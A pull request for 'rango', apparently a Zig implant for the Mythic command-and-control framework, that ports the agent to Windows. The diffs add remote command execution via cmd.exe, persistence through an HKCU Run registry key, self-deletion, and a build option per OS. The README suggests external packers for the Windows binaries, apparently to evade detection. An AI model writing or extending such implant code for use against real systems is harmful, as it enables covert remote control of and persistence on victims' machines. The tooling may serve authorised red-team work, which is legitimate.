### PR TITLE
Support for windows targets

### DIFF
--- a/Payload_Type/rango/rango/agent_code/build.zig
+++ b/Payload_Type/rango/rango/agent_code/build.zig
@@ -1,16 +1,8 @@
 const std = @import("std");
 
 pub fn build(b: *std.Build) void {
-    const target = b.standardTargetOptions(.{
-        .default_target = .{
-            .cpu_arch = .x86_64,
-            .os_tag = .linux,
-            .abi = .gnu,
-        },
-    });
-    const optimize = b.standardOptimizeOption(.{
-        .preferred_optimize_mode = .ReleaseSmall,
-    });
+    const target = b.standardTargetOptions(.{});
+    const optimize = b.standardOptimizeOption(.{});
 
     const exe_mod = b.createModule(.{
         .root_source_file = b.path("src/main.zig"),
@@ -22,6 +14,10 @@ pub fn build(b: *std.Build) void {
         .name = "rango",
         .root_module = exe_mod,
     });
+
+    if (target.result.os.tag == .windows) {
+        exe.subsystem = .Windows;
+    }
 
     b.installArtifact(exe);
 

--- a/Payload_Type/rango/rango/agent_code/src/agent.zig
+++ b/Payload_Type/rango/rango/agent_code/src/agent.zig
@@ -100,7 +100,7 @@ pub const MythicAgent = struct {
                     std.fs.deleteFileAbsolute(exe_path) catch |err| {
                         print("{}", .{err});
                     };
-                    std.posix.exit(0);
+                    std.process.exit(0);
                 }
             }
 

--- a/Payload_Type/rango/rango/agent_code/src/commands.zig
+++ b/Payload_Type/rango/rango/agent_code/src/commands.zig
@@ -1,4 +1,5 @@
 const std = @import("std");
+const builtin = @import("builtin");
 const types = @import("types.zig");
 const json = std.json;
 const base64 = std.base64;
@@ -55,9 +56,11 @@ pub const CommandExecutor = struct {
                 .status = "error",
             };
         }
+        const shell_path = if (builtin.os.tag == .windows) "cmd.exe" else "/bin/sh";
+        const shell_args  = if (builtin.os.tag == .windows) "/c"     else "-c";
         const result = std.process.Child.run(.{
             .allocator = self.allocator,
-            .argv = &[_][]const u8{ "/bin/sh", "-c", command },
+            .argv = &[_][]const u8{ shell_path, shell_args, command },
         }) catch |err| {
             return MythicResponse{
                 .task_id = task.id,

--- a/Payload_Type/rango/rango/agent_code/src/utils.zig
+++ b/Payload_Type/rango/rango/agent_code/src/utils.zig
@@ -339,11 +339,17 @@ pub const PersistUtils = struct {
         if (builtin.os.tag == .windows) {
             const existing = try std.process.Child.run(.{
                 .allocator = allocator,
-                .argv = &.{ "schtasks", "/Delete", "/TN", "Rango", "/F" },
+                .argv = &.{
+                    "reg.exe",
+                    "delete",
+                    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
+                    "/v",
+                    "Rango",
+                    "/f"
+                },
             });
-            // What if task is not found?
-            if (existing.term.Exited != 0 ) {
-                return error.SchtasksDeleteFailed;
+            if (existing.term.Exited != 0) {
+                return error.RegistryDeleteFailed;
             }
         } else {
             const existing = std.process.Child.run(.{

--- a/Payload_Type/rango/rango/agent_code/src/utils.zig
+++ b/Payload_Type/rango/rango/agent_code/src/utils.zig
@@ -100,6 +100,15 @@ pub const SystemInfo = struct {
             };
             var tokens = std.mem.splitAny(u8, result.stdout, "\n");
             const first_ip = tokens.first();
+            while (tokens.next()) |line| {
+                if (std.mem.indexOf(u8, line, "IPv4 Address") != null) {
+                    const ip_start = std.mem.indexOf(u8, line, ":") orelse continue;
+                    const ip_str = std.mem.trim(u8, line[ip_start + 1 ..], " \t\r\n");
+                    if (ip_str.len > 0 and std.mem.indexOf(u8, ip_str, ".") != null) {
+                        return try self.allocator.dupe(u8, ip_str);
+                    }
+                }
+            }
             if (first_ip.len == 0) {
                 return try self.allocator.dupe(u8, "127.0.0.1");
             }

--- a/Payload_Type/rango/rango/agent_code/src/utils.zig
+++ b/Payload_Type/rango/rango/agent_code/src/utils.zig
@@ -295,8 +295,9 @@ pub const PersistUtils = struct {
             });
 
             if (result.term.Exited != 0) {
-                return error.SchtasksCreateFailed;
+                return error.RegistryWriteFailed;
             }
+
         } else {
 
             const existing = std.process.Child.run(.{

--- a/Payload_Type/rango/rango/agent_functions/builder.py
+++ b/Payload_Type/rango/rango/agent_functions/builder.py
@@ -151,7 +151,7 @@ pub const agentConfig: types.AgentConfig = .{{
             StepSuccess=True
         ))
         command = f"zig build -Dtarget={zig_target} --release=small"
-        filename = str(self.agent_code_path / "zig-out" / "bin" / "rango")
+        filename = str(self.agent_code_path / "zig-out" / "bin" / binary_name)
         proc = await asyncio.create_subprocess_shell(
             command,
             stdout=asyncio.subprocess.PIPE,

--- a/Payload_Type/rango/rango/agent_functions/builder.py
+++ b/Payload_Type/rango/rango/agent_functions/builder.py
@@ -16,7 +16,7 @@ class Rango(PayloadType):
     name = "rango"
     #file_extension = "exe"
     author = "@pop-ecx"
-    supported_os = [SupportedOS.Linux]
+    supported_os = [SupportedOS.Linux, SupportedOS.Windows]
     wrapper = False
     wrapped_payloads = []
     note = """Simple zig implant for Linux"""
@@ -25,6 +25,14 @@ class Rango(PayloadType):
     mythic_encrypts = False
     translation_container = "RangoTranslator" # "myPythonTranslation"
     build_parameters = [
+        BuildParameter(
+            name="os",
+            parameter_type=BuildParameterType.ChooseOne,
+            description="Choose operating system",
+            choices=["linux", "windows"],
+            default_value="linux",
+            required=True,
+        ),
         BuildParameter(
             name="out",
             parameter_type=BuildParameterType.ChooseOne,
@@ -35,7 +43,7 @@ class Rango(PayloadType):
         BuildParameter(
                 name="pack_with_zyra",
                 parameter_type=BuildParameterType.Boolean,
-                description="Pack the final payload with ZYRA",
+                description="Pack the final payload with ZYRA (Linux only)",
                 default_value=False,
         ),
         BuildParameter(
@@ -96,6 +104,18 @@ class Rango(PayloadType):
         if config["proxy_host"] != "":
             config["proxyEnabled"] = True
 
+        target_os = self.get_parameter("os")
+        if target_os == "linux":
+            zig_target = "x86_64-linux-gnu"
+            binary_name = "rango"
+        elif target_os == "windows":
+            zig_target = "x86_64-windows-gnu"
+            binary_name = "rango.exe"
+        else:
+            resp.status = BuildStatus.Error
+            resp.build_message = f"Unsupported OS: {target_os}"
+            return resp
+
         # Payload creation
         await SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage(
             PayloadUUID=self.uuid,
@@ -130,7 +150,7 @@ pub const agentConfig: types.AgentConfig = .{{
             StepStdout="Generated config.zig with agent settings",
             StepSuccess=True
         ))
-        command = f"zig build -Dtarget=x86_64-linux-gnu --release=small"
+        command = f"zig build -Dtarget={zig_target} --release=small"
         filename = str(self.agent_code_path / "zig-out" / "bin" / "rango")
         proc = await asyncio.create_subprocess_shell(
             command,
@@ -154,7 +174,7 @@ pub const agentConfig: types.AgentConfig = .{{
         ))
         pack_with_zyra = self.get_parameter("pack_with_zyra")
         packing_key = self.get_parameter("Packing_key")
-        if pack_with_zyra and packing_key:
+        if pack_with_zyra and target_os=="linux" and packing_key:
             packed_filename = f"{filename}p"
             pack_cmd = f"zyra -o {packed_filename} -k {packing_key} {filename}"
             proc = await asyncio.create_subprocess_shell(
@@ -179,10 +199,15 @@ pub const agentConfig: types.AgentConfig = .{{
                 StepSuccess=True
             ))
         else:
+            skip_msg = (
+                "Skipped ZYRA packing (option disabled)"
+                if not pack_with_zyra
+                else "Skipped ZYRA packing (ZYRA is Linux-only)"
+            )
             await SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage(
                 PayloadUUID=self.uuid,
                 StepName="Packing",
-                StepStdout="Skipped ZYRA packing (option disabled)",
+                StepStdout=skip_msg,
                 StepSuccess=True
             ))
         resp.payload = open(filename, "rb").read()

--- a/README.md
+++ b/README.md
@@ -36,7 +36,9 @@ sudo ./mythic-cli install github https://github.com/pop-ecx/rango.git
 
 ## Announcements
 Rango now supports Windows targets. Most of the linux features are ported over to
-windows as well. It is still in its early stages and at this point does not
+windows as well. You can use the same format for commands in linux for windows
+e.g `ls` works the same in windows as it does in linux.
+It is still in its early stages and at this point does not
 support packing out of the box. You can use external packers to pack the windows
 binaries.
 

--- a/README.md
+++ b/README.md
@@ -36,8 +36,8 @@ sudo ./mythic-cli install github https://github.com/pop-ecx/rango.git
 
 ## Announcements
 Rango now supports Windows targets. Most of the linux features are ported over to
-windows as well. It is still in its rearly stages and at this point does not
-support packing out of the box. You can use external packers to back the windows
+windows as well. It is still in its early stages and at this point does not
+support packing out of the box. You can use external packers to pack the windows
 binaries.
 
 > :warning: Rango is still not mature yet. Expect some bugs.

--- a/README.md
+++ b/README.md
@@ -34,7 +34,14 @@ sudo ./mythic-cli install github https://github.com/pop-ecx/rango.git
 - ~[ ]File upload and download~
 - ~[ ] encryption~
 
+## Announcements
+Rango now supports Windows targets. Most of the linux features are ported over to
+windows as well. It is still in its rearly stages and at this point does not
+support packing out of the box. You can use external packers to back the windows
+binaries.
+
 > :warning: Rango is still not mature yet. Expect some bugs.
+
 
 
 > Since the agent nor translator doesn't support encryption at the moment, you can achieve this using ssl in http profile. Make sure the ssl is from a trusted CA as zig's http client can be bitchy if it isn't.


### PR DESCRIPTION
This PR adds support to compile and execute for windows targets. All commands supported for Linux will be the same as for windows. Windows binaries do not yet support packing out-of-the-box. Pack windows binaries externally for the time being.